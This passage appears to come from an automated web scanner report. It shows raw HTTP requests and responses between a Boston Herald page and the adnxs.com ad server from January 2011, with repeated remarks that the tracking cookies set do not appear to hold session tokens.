acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 22:39:44 GMT Content-Length: 834
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-256627_1296258325%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D357355%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb780011=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb781784=5_[r^208WMt+t%s!@@-#?/ty]?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP-d6bImG40osBWHfHSmrEEIVVUNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA3AUBAgUCAAUAAAAAVyHLDgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296258325%29%3Buf%28%27r%27%2C+151403%2C+1296258325%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2811%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2887%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28619%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28620%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28621%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 23:45:25 GMT Content-Length: 824
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15223392_1296252139%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D463717%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.47846851754002273%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-59440650_1296255616%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D901204%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb825542=5_[r^208WMM2x@N!@@-#r?TIj?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP0905Saroqh9BWHfHSmrEEKxcENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAAIAkBAgUCAAUAAAAAhyLogAAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296265393%29%3Buf%28%27r%27%2C+116344%2C+1296265393%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:43:13 GMT Content-Length: 826
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15223392_1296252139%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D463717%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.47846851754002273%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&